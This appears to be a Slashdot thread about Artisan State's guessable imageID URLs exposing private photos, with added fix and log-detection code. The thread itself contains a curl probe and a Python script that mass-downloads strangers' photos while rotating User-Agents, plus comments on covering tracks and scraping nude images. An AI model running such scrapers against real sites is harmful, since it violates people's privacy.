Photo Printing Website Artisan State Allows Access To All User-Uploaded Photos
fulldecent writes: Popular photo printing website Artisan State, which specializes in bound photo books mostly for weddings or other events, unintentionally makes all its uploaded user photos available publicly for download. This case study shows how their photos are able to be downloaded and discusses the things vendors should think about when considering security of seemingly private user content. The case study also discusses how this flaw was reported to the vendor, but unfortunately never fixed. This follows other articles on Slashdot discussing security disclosure. How do you report vulnerabilities to vendors? Do you support publishing them if they are not fixed in a reasonable time?
Be careful when using this vulnerability... depending on your purpose in using it, you could be literally committing a crime. If you download the images by modifying the URL... people have gone to jail for that.
"First they came for the slanderers and I said nothing."
I was preparing a book for one of my clients and as I was uploading the photos, which are personal, my first thought was... should I really be uploading these photos to this website? We just met.
The answer is no, of course you shouldn't trust any website. If you want it to remain private, leave it off the internet.
Full disclosure may well be a necessary evil -- sure, it allows anyone for some period of time to exploit the vulnerability; but it sure ends up getting fixed. Companies will wait months and years to fix security bugs if there is no clear and present danger.
Any time I disclose a bug to a vendor, I now tell them in the e-mail they have five days to fix it; after that it will be publicly disclosed. And I always make good on the disclosure.
... plenty of lead time and follow-up.
These issues need to be publicized when the hosting site doesn't give a fuck. Customers have a right to know.
It little behooves the best of us to comment on the rest of us.
You know there's pictures of penises in there, anyone can get to them. 'Nuff said, right? Wasn't chat roulette working on some penis detection code? Perhaps someone could hook that code up to an automated web robot to automatically ferret the dick pics out of this site.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
If you see a car unlocked you tell the owner, but you don't tell everyone. If you see a flaw in the design of the door which means all of the cars will be unlocked you don't have any way to tell the owners without telling everyone.
Small quantities, by hand, using traditional methods - it's the last part that has become the fashion, where any developments that have happened are ignored in favour of doing it how it was done a century ago.
You should ask them why they aren't fighting in the Great War.
After being arrested, tortured and killed for trying to alert an on-line service to their vulnerability due to poor design, I no longer try to contact vendors directly. I now publish the information in great detail to pirate sites, and I have found that this will get the attention of the company much better than trying to alert them quietly.
I'm an American. I love this country and the freedoms that we used to have.
If you are not logged in as me then you have no business accessing that photo. But alas... you can. There is nothing special about that URL, in fact you can access every photo this way. The following command confirms that you have access to a random photo without actually downloading it.
ID=$(php -r 'echo mt_rand(0,8000000);')   # pick a random image ID in the range observed on the site
URL="http://upload.artisanstate.com/upload/UploadServer/GetRenderImage?imageID=$ID"
curl --head "$URL" --silent | grep Length   # HEAD request only: a Content-Length line shows the image is served without a login
It is not hard to figure out how to edit this command to download all photos. Please don't. Based on how many photos are on Artisan State and the fact that they use Amazon S3, it will cost them about $80 each time you run the edited command.
Really? REALLY? That's like crack for trolls.
Your hipster district is obviously different than mine. I have literally never seen the word artisanal other than in your post. I see the word artisan all the time, but I believe in 100% of cases, it is used incorrectly. According to the dictionary it means "using a trained artistic skill". I have seen minimum wage workers slapping sandwiches together called "sandwich artisans". Nope. Slapping sandwiches together in a poor fashion and forgetting half the ingredients is not artisanship.
If you are not allowed to question your government then the government has answered your question.
In an ideal world you'd notify the vendor, the problem would get fixed and the world would move on. Alas, we don't live in an ideal world. Vendors fail to fix problems. Users don't upgrade software, or can't upgrade it, or are unaware they're even using it, and the vendor doesn't publicly announce the fix and the need to apply it. The threat of disclosure, and the eventual disclosure even if the vendor doesn't say anything, is the only leverage we have to make sure vendors really do fix problems and users know what they need to know to assess the risks and mitigate the problem if they can't apply the fix. I'd love not to need to use that leverage, but we've seen how well that works already and we see repeated examples showing that vendors haven't changed their ways. Realistically the best we can manage is to notify the vendor (with full details, so they can verify the flaw is real and can't believably claim they couldn't replicate it) and give a deadline for either fixing the problem or providing mitigation measures, and then follow through with complete disclosure (so others can verify the problem's real without having to take our word for it) if the deadline passes without the vendor having disclosed the details themselves.
Unfortunately too many vendors have made it unsafe to do even that much. They don't just ignore problem reports and deny the problem exists, they actively try to silence the person reporting it through lawsuits and criminal prosecution and smear campaigns. When dealing with vendors like that you can't safely notify the vendor of a problem. I don't like it, but when dealing with a vendor like that all you can do is dump all the details into one or more suitable disclosure forums and make sure you've covered your tracks thoroughly so the vendor can't trace the disclosure back to you. Then clam up on the subject and don't say a single word anywhere to give anyone the idea that you were at all involved, lest you give the vendor a reason to suspect you. It's not a polite, civilized way of dealing with the matter, but I figure if the vendor's made its bed it's just going to have to lie in it.
A fact:
The whole point of the WWW is that if you have the URL, you can get the content.
There are many useful cases where guessing the URL is the right thing to do.
Given this, there are two ways that laws can go.
A) Using any URL that you were not given may be illegal.
B) Using any URL you want is ok.
Plan A eliminates many useful access methods, removes any pesky responsibility from the web site developer, and gives the bad guy (and lawyers) a great operating environment. It penalizes the good guy and optimizes the web for the bad guy.
Plan B requires the web site developer to have a clue about security. This is not rocket science: a big RN in each URL should suffice. The problem is that this plan provides a legal shield for all sorts of nefarious activities.
So what is the right compromise?
Consider the following story.
You go to a gym and the owner gives you the combination 223 for locker 100. You switch lockers and he gives you the combination 333 for locker 210. You blink twice and know the combination is the locker number plus 123. The owner has basically taught you the open secret for all the combinations for all lockers. Now clearly you shouldn't steal from another locker regardless of whether it is locked or not. The question is whether you should have an extra responsibility because it is locked, even in a lame manner. Did the owner have a responsibility to use a non-lame combination scheme? Is there a threshold for lame versus non-lame?
The story is particularly interesting on the WWW, where having a URL gives you access to the content. There is a mix of content that the owner likes anybody to see, and content where the owner would like access to be restricted. If the content owner (like the gym owner) basically publishes the URL, then would not a reasonable person assume that the owner would like anybody to get it?
Well maybe yes and maybe no. Some sites have terms of use which a person with a random URL might not see. Given this, should there be a responsibility on the content owner to use a non-lame URL for content he wishes to restrict access to?
I think a useful compromise is that if you can easily guess the URL, with good odds on the first try, it is definitely fair game.
In the photo printing example, if the web site wanted restricted access, they would have used something more than a sequential picture number.
Given that they did not, a reasonable person would assume that they wanted unrestricted access.
The 'good odds on the first try' test works well to separate password hackers from trying to easily search another city on Craigslist.
This gives us a blend of plans A and B and defines the duty of both the web site developer and user in a useful way.
Note that current law is pretty crazy in this area. Folks are in jail for using URLs that had great odds on the first try and no other nefarious activity. Just because it sounds reasonable does not mean that one would be wise to use it without pause.
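As an added example (not code from the thread or from Artisan State), the unchecked lookup described for GetRenderImage is shown beside two fixes a vendor could apply: an owner check on the session, and an unguessable share token playing the role of the "big RN" in the URL. The last function puts the "good odds on the first try" test into numbers. PHOTOS, SERVER_KEY and the user names are constructed for the example.

```python
import hmac
import hashlib
import secrets

# Constructed sample store: imageID -> (owner, image bytes). Names and bytes are hypothetical.
PHOTOS = {21022809: ("alice", b"JPEG-1"), 21022810: ("bob", b"JPEG-2")}
SERVER_KEY = secrets.token_bytes(32)   # server-side secret for share links (hypothetical)

def get_render_image_vulnerable(image_id, session_user=None):
    """The pattern discussed in the thread: whoever knows or guesses imageID gets the bytes."""
    if image_id in PHOTOS:
        return 200, PHOTOS[image_id][1]   # no check that the caller owns the photo
    return 404, None

def get_render_image_fixed(image_id, session_user):
    """Object-level authorization: serve the photo only to the logged-in owner."""
    entry = PHOTOS.get(image_id)
    if entry is None or session_user is None or entry[0] != session_user:
        return 404, None   # same answer for 'missing' and 'not yours': no enumeration oracle
    return 200, entry[1]

def make_share_token(image_id):
    """Unguessable capability so a photo can be shared without a login; same purpose as a
    big random number in the URL, but derived from a server secret so nothing is stored."""
    return hmac.new(SERVER_KEY, str(image_id).encode(), hashlib.sha256).hexdigest()

def get_render_image_by_token(image_id, token):
    """Serve by (imageID, token); the token is bound to one imageID and cannot be guessed."""
    expected = make_share_token(image_id)
    if image_id in PHOTOS and hmac.compare_digest(expected, token):
        return 200, PHOTOS[image_id][1]
    return 404, None

def first_try_hit_probability(id_space_bits, live_ids):
    """The 'good odds on the first try' test: chance that one random guess lands on a live
    object. Sequential 23-bit IDs with ~8 million live photos: about 0.95; 128-bit tokens:
    effectively zero."""
    return live_ids / 2 ** id_space_bits
```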
My favorite is when people mispronounce / misspell artisan as artesian.
I always ask them what those pastries/bread/haircuts/etc. have to do with natural water wells :-)
Looks like it has been fixed. Or at least you have to login to see anything.
https://www.schneier.com/essay... Well worth the read if you haven't before.
I remember sigs. Oh, a simpler time!
Third last paragraph gave me a laugh.
Well yeah I guess the average reddit user does have certain distinguishing traits.
It's the pressure man!
My pet hate now is I live in a suburb on a bend on a river and a pile of trendy people are calling it a "village" on a "peninsula".
First time a vulnerability was disclosed on Slashdot?
So you have a poor vocabulary. Try watching something other than Fox news.
Of course it's possible you live in a place full of fuckwits and they just use the noun as an adjective. Artisan sandwich? Are they cannibals round here?
Confucius say, "Find worm in apple - bad. Find half a worm - worse."
http://upload.artisanstate.com/upload/UploadServer/GetRenderImage?imageID=21022809
# Python 2 script as posted in the thread: it fetches 200 images by guessing imageID.
import requests
import random
import os
import sys
import time

# Unbuffered stdout (Python 2 only; Python 3 rejects unbuffered text streams here).
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)

tmp_pth = 'C:\\temp'
os.chdir(tmp_pth)

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "User-Agent": "Mozilla/" + str(round(random.random() * 5, 1)) + " (Windows NT 6; WOW32; rv:38.0) Gecko/20100101 Firefox/" + str(round(random.random() * 37, 1)),
    "DNT": "1"
}

# User-Agent strings swapped in per request; only the first ten are ever selected below.
agents = [
    "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
    "Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
    "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
    "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
]

for i in range(200):
    ID = str(int(random.random() * 8000000))          # random imageID in the observed range
    headers["User-Agent"] = agents[int(random.random() * 10)]
    r = requests.get(
        'http://upload.artisanstate.com/upload/UploadServer/GetRenderImage?imageID=' + ID,
        headers=headers)
    fh = open(ID + '.jpg', 'wb')                       # saves whatever came back, even errors
    fh.write(r.content)
    fh.close()
    print 'wrote', i, tmp_pth + '\\' + ID + '.jpg'
    time.sleep(random.random() / 10.)                  # short random pause between requests
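Added example, not from the thread: detection logic a site operator could run over its access logs to spot the footprint a script like the one above leaves, namely imageIDs scattered across the whole ID space and a User-Agent that changes from request to request on one client. The log lines, IP addresses and thresholds are constructed for this sample.

```python
import re
from collections import defaultdict

# Constructed access-log sample (combined format), not real traffic: 198.51.100.9 pages
# through one album; 203.0.113.7 behaves like the script above (random IDs, rotating UA).
LOG = """\
198.51.100.9 - - [12/Jun/2015:10:00:01 +0000] "GET /upload/UploadServer/GetRenderImage?imageID=21022809 HTTP/1.1" 200 48213 "-" "Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0"
198.51.100.9 - - [12/Jun/2015:10:00:03 +0000] "GET /upload/UploadServer/GetRenderImage?imageID=21022810 HTTP/1.1" 200 51020 "-" "Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0"
203.0.113.7 - - [12/Jun/2015:10:00:05 +0000] "GET /upload/UploadServer/GetRenderImage?imageID=4418273 HTTP/1.1" 200 39011 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)"
203.0.113.7 - - [12/Jun/2015:10:00:05 +0000] "GET /upload/UploadServer/GetRenderImage?imageID=90211 HTTP/1.1" 200 12877 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3"
203.0.113.7 - - [12/Jun/2015:10:00:06 +0000] "GET /upload/UploadServer/GetRenderImage?imageID=7733190 HTTP/1.1" 200 60402 "-" "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)"
203.0.113.7 - - [12/Jun/2015:10:00:06 +0000] "GET /upload/UploadServer/GetRenderImage?imageID=2560004 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1"
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET [^" ]*GetRenderImage\?imageID=(\d+) [^"]*" '
    r'(\d{3}) \d+ "[^"]*" "([^"]*)"$')

def summarise(log_text):
    """Per client IP: the distinct imageIDs requested and the distinct User-Agents used."""
    clients = defaultdict(lambda: {"ids": set(), "agents": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, _stamp, image_id, _status, agent = m.groups()
            clients[ip]["ids"].add(int(image_id))
            clients[ip]["agents"].add(agent)
    return clients

def flag_enumeration(clients, max_agents=1, max_spread_per_id=1000):
    """Flag clients whose IDs are scattered across the ID space or whose UA keeps changing.
    A real album is a tight, mostly sequential run; the thresholds suit this tiny sample."""
    flagged = {}
    for ip, c in clients.items():
        ids = sorted(c["ids"])
        spread = ids[-1] - ids[0] if len(ids) > 1 else 0
        reasons = []
        if len(c["agents"]) > max_agents:
            reasons.append("rotating user-agent")
        if spread > max_spread_per_id * len(ids):
            reasons.append("ids scattered across id space")
        if reasons:
            flagged[ip] = reasons
    return flagged
```

On real logs the same two signals are worth pairing with a per-client rate limit on GetRenderImage, which also caps the S3 bill the earlier comment worries about.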